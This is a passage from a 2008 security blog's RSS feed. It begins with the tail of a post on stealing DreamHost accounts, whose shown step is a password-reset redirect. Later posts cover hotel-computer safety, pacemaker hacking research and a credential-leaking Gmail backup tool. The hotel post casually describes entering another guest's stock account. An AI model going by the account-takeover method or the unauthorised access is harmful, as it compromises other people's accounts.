<pre><span class="lnum">  10:  </span><span class="kwrd">&lt;/</span><span class="html">html</span><span class="kwrd">&gt;</span></pre>
<style type="text/css"> .csharpcode, .csharpcode pre { 	font-size: small; 	color: black; 	font-family: consolas, "Courier New", courier, monospace; 	background-color: #ffffff; 	/*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt  { 	background-color: #f4f4f4; 	width: 100%; 	margin: 0em; } .csharpcode .lnum { color: #606060; }</style>
<p>this last step is to send a forget password notice to the new email address.</p>
<p>that&#8217;s it - 4 pages and you can get any dreamhost account..</p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/06/14/how-to-steal-dreamhost-accounts/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Some of the best security related feeds</title>
		<link>http://guymizrahi.com/2008/06/09/some-of-the-best-security-related-feeds/</link>
		<comments>http://guymizrahi.com/2008/06/09/some-of-the-best-security-related-feeds/#comments</comments>
		<pubDate>Mon, 09 Jun 2008 06:37:28 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<category><![CDATA[Rss Feeds]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/06/09/some-of-the-best-security-related-feeds/</guid>
		<description><![CDATA[I have created an agregator that has most of the security rss feeds that i read.
I think most of you will find it intresting.
Lett me know if you think something is missing  
http://securityfeed.info/
]]></description>
			<content:encoded><![CDATA[<p>I have created an agregator that has most of the security rss feeds that i read.</p>
<p>I think most of you will find it intresting.</p>
<p>Lett me know if you think something is missing <img src='http://guymizrahi.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a href="http://securityfeed.info/" title="Rss feeds about security" target="_blank">http://securityfeed.info/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/06/09/some-of-the-best-security-related-feeds/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Isn’t it cool to see e-mule working like this ?</title>
		<link>http://guymizrahi.com/2008/05/02/isnt-it-cool-to-see-e-mule-working-like-this/</link>
		<comments>http://guymizrahi.com/2008/05/02/isnt-it-cool-to-see-e-mule-working-like-this/#comments</comments>
		<pubDate>Fri, 02 May 2008 04:15:21 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/05/02/isnt-it-cool-to-see-e-mule-working-like-this/</guid>
		<description><![CDATA[
]]></description>
			<content:encoded><![CDATA[<p><a href="http://guymizrahi.com/wp-content/uploads/2008/05/emule.jpg" target="_blank"><img src="http://guymizrahi.com/wp-content/uploads/2008/05/emule-thumb.jpg" style="border-width: 0px" alt="emule" border="0" height="318" width="392" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/05/02/isnt-it-cool-to-see-e-mule-working-like-this/feed/</wfw:commentRss>
		</item>
		<item>
		<title>The best discount for Dreamhost hosting plans.</title>
		<link>http://guymizrahi.com/2008/04/16/the-best-discount-for-dreamhost-hosting-plans/</link>
		<comments>http://guymizrahi.com/2008/04/16/the-best-discount-for-dreamhost-hosting-plans/#comments</comments>
		<pubDate>Wed, 16 Apr 2008 17:55:53 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/04/16/the-best-discount-for-dreamhost-hosting-plans/</guid>
		<description><![CDATA[Dreamhost is one of the most hated hosting company.
I use their services for more than 6 months now.
In the first weeks - I was suffering from sluggish connection, low speed and more problems.
In the past 3 or 4 month I am very happy with their servers and connection. Look like they solved many of their [...]]]></description>
			<content:encoded><![CDATA[<p>Dreamhost is one of the most hated hosting company.</p>
<p>I use their services for more than 6 months now.</p>
<p>In the first weeks - I was suffering from sluggish connection, low speed and more problems.</p>
<p>In the past 3 or 4 month I am very happy with their servers and connection. Look like they solved many of their problems.</p>
<p>If you need a hosting service and you don&#8217;t want to be bothered with space, bandwith and domains restrictions - you can check their hosting.</p>
<p>If you want Dreamhost hosting with the best discount - I created a kickass coupon for it:</p>
<p>You&#8217;ll get 50$ discount and a free IP! It is the best deal you can get from them <img src='http://guymizrahi.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>If you want it - just enter <strong>KICKASS </strong>as the <strong>Promo Code.</strong></p>
<p>What you&#8217;ll get (beside the discount and the free IP)?</p>
<ul>
<li>500 GB Disk Storage</li>
<li>5 TB Monthly Bandwidth</li>
<li>Plus <a href="http://guymizrahi.com/wp-admin/hosting.html">many more features!</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/04/16/the-best-discount-for-dreamhost-hosting-plans/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Find other sites on a specific IP</title>
		<link>http://guymizrahi.com/2008/03/29/find-other-sites-on-a-specific-ip/</link>
		<comments>http://guymizrahi.com/2008/03/29/find-other-sites-on-a-specific-ip/#comments</comments>
		<pubDate>Sat, 29 Mar 2008 11:45:39 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Hosting]]></category>

		<category><![CDATA[IP]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/03/29/find-other-sites-on-a-specific-ip/</guid>
		<description><![CDATA[
It can be very useful to see what other sites are sitting on your site&#8217;s IP.
When you are using a shared host for your site or blog, you basically risk your site.
If an attacker is targeting other sites on the same server,  his attack can hit you as well as other sites on the [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.yougetsignal.com/tools/web-sites-on-web-server/"></a></p>
<p>It can be very useful to see what other sites are sitting on your site&#8217;s IP.</p>
<p>When you are using a shared host for your site or blog, you basically risk your site.</p>
<p>If an attacker is targeting other sites on the same server,  his attack can hit you as well as other sites on the server.</p>
<p>More other sites on the hosting server = More chances your site can be hit in their attack process.</p>
<p>So how can you check the sites on your hosting server?</p>
<p>You can do it using this tool:</p>
<p><a href="http://www.yougetsignal.com/tools/web-sites-on-web-server/" title="http://www.yougetsignal.com/tools/web-sites-on-web-server/">http://www.yougetsignal.com/tools/web-sites-on-web-server/</a></p>
<p><a href="http://www.yougetsignal.com/tools/web-sites-on-web-server/"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/03/29/find-other-sites-on-a-specific-ip/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Internet in hotels</title>
		<link>http://guymizrahi.com/2008/03/14/internet-in-hotels/</link>
		<comments>http://guymizrahi.com/2008/03/14/internet-in-hotels/#comments</comments>
		<pubDate>Fri, 14 Mar 2008 17:40:37 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<category><![CDATA[Hotels]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/03/14/internet-in-hotels/</guid>
		<description><![CDATA[Surprise surprise - we are in Eilat 
My mom placed an order for hotel and flights to Eilat but she and my dad couldn&#8217;t go.
My wife and me got the vacation.. thanks mom and dad 
When we arrived into the hotel, we upgraded our vacation to VIP and therefore we can get into the business [...]]]></description>
			<content:encoded><![CDATA[<p>Surprise surprise - we are in Eilat <img src='http://guymizrahi.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />
<p>My mom placed an order for hotel and flights to Eilat but she and my dad couldn&#8217;t go.
<p>My wife and me got the vacation.. thanks mom and dad <img src='http://guymizrahi.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />
<p>When we arrived into the hotel, we upgraded our vacation to VIP and therefore we can get into the business lounge.
<p>We enjoy free food and drinks, breakfast in the 12&#8242;th floor with an amazing view.
<p>The business lounge has two computers in it with a (more or less) fast Internet connection.
<p>When I got to the computers both had their Internet browsers open.
<p>One quick look and I saw that one computer was on Google. The guy who surf there before me left his Gmail account logged on.. You don&#8217;t even need to hack into his Gmail <img src='http://guymizrahi.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />
<p>The other computer was in stock&#8217;s site. A few clicks &#8220;back&#8221; in the browser&#8217;s toolbar and I was logged as him.
<p>It didn’t end there&#8230;
<p>A quick review of the computer show that it is full with spywares, Trojan horses, and other malware. The computer had Spy Sweeper installed but it didn’t help..
<p>So how can you work safely?
<p>1. Don’t leave your account logged in when you finish using it. It is better if you will not get into sites that require User and Password.
<p>2. Delete the browser history, temp files and cookies when you finish.
<p>3. Close the Internet Browser. Restart the computer. (If the policies do not allow this you can disconnect the computer from the electricity – it works too <img src='http://guymizrahi.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> )
<p>4. Best if you disconnect the computer from the network and use your laptop.
<p>5. Work with cellular modem and don’t rely on the hotel.
<p>In my Hebrew blog I wrote once <a href="http://www.hacking.org.il/530" target="_blank">how to bypass Captive Portals</a>.
<p>Got some fire when I wrote that..</p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/03/14/internet-in-hotels/feed/</wfw:commentRss>
		</item>
		<item>
		<title>killing using hacking skills?</title>
		<link>http://guymizrahi.com/2008/03/12/hack-to-pacemaker/</link>
		<comments>http://guymizrahi.com/2008/03/12/hack-to-pacemaker/#comments</comments>
		<pubDate>Wed, 12 Mar 2008 15:27:01 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Health]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/03/12/hack-to-pacemaker/</guid>
		<description><![CDATA[Yes, It is possible.
Security researchers managed to hack to defibrillator and pacemaker using Wireless (Yes, it is possible to hack it when the stuff is in one&#8217;s chest).
When they made POC the researchers put a defibrillator in a bag full of meat and managed to make it give a strong electric shock.
Scary..
The research here:
http://www.secure-medicine.org/PervasiveIMDSecurity.pdf
]]></description>
			<content:encoded><![CDATA[<p>Yes, It is possible.</p>
<p>Security researchers managed to hack to defibrillator and pacemaker using Wireless (Yes, it is possible to hack it when the stuff is in one&#8217;s chest).</p>
<p>When they made POC the researchers put a defibrillator in a bag full of meat and managed to make it give a strong electric shock.</p>
<p>Scary..</p>
<p>The research here:</p>
<p><a title="http://www.secure-medicine.org/PervasiveIMDSecurity.pdf" href="http://www.secure-medicine.org/PervasiveIMDSecurity.pdf">http://www.secure-medicine.org/PervasiveIMDSecurity.pdf</a></p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/03/12/hack-to-pacemaker/feed/</wfw:commentRss>
		</item>
		<item>
		<title>G-Archiver is exposing your Gmail account details.</title>
		<link>http://guymizrahi.com/2008/03/12/garchiver-hacks-gmail-accounts/</link>
		<comments>http://guymizrahi.com/2008/03/12/garchiver-hacks-gmail-accounts/#comments</comments>
		<pubDate>Wed, 12 Mar 2008 15:18:39 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[Gmail]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/03/12/garchiver-hacks-gmail-accounts/</guid>
		<description><![CDATA[&#8220;G-Archiver is your one click Gmail backup solution. Backup Gmail email messages&#8221;
The developer forgot to mention that G-Archiver also give him the ability to hack into your Gmail account.
read about it here:
http://www.codinghorror.com/blog/archives/001072.html
]]></description>
			<content:encoded><![CDATA[<p><b>&#8220;G-Archiver is your one click Gmail backup solution. Backup Gmail email messages&#8221;</b></p>
<p>The developer forgot to mention that G-Archiver also give him the ability to <strong>hack into your Gmail account.</strong></p>
<p>read about it here:</p>
<p><a title="http://www.codinghorror.com/blog/archives/001072.html" href="http://www.codinghorror.com/blog/archives/001072.html">http://www.codinghorror.com/blog/archives/001072.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/03/12/garchiver-hacks-gmail-accounts/feed/</wfw:commentRss>
		</item>
		<item>
		<title>MacBook Air - The bad stuff..</title>
		<link>http://guymizrahi.com/2008/03/12/about-macbook-air/</link>
		<comments>http://guymizrahi.com/2008/03/12/about-macbook-air/#comments</comments>
		<pubDate>Tue, 11 Mar 2008 22:05:24 +0000</pubDate>
		<dc:creator>Guy Mizrahi</dc:creator>
		
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://guymizrahi.com/2008/03/12/about-macbook-air/</guid>
		<description><![CDATA[So you want that MacBook Air, Ha?
You go, buy this awesome laptop and then what?
1. You throw it to the garbage?
2. You are suspected as a terrorist when trying to take it to flight (And loosing your flight)?
3. All of the above..
]]></description>
			<content:encoded><![CDATA[<p>So you want that MacBook Air, Ha?</p>
<p>You go, buy this awesome laptop and then what?</p>
<p>1. <a href="http://www.newsweek.com/id/120052/output/print" target="_blank" rel="nofollow">You throw it to the garbage</a>?</p>
<p>2. <a href="http://www.engadget.com/2008/03/10/tsa-cant-believe-macbook-air-is-a-real-laptop-causes-owner-to/" target="_blank" rel="nofollow">You are suspected as a terrorist when trying to take it to flight (And loosing your flight)</a>?</p>
<p>3. All of the above..</p>
]]></content:encoded>
			<wfw:commentRss>http://guymizrahi.com/2008/03/12/about-macbook-air/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
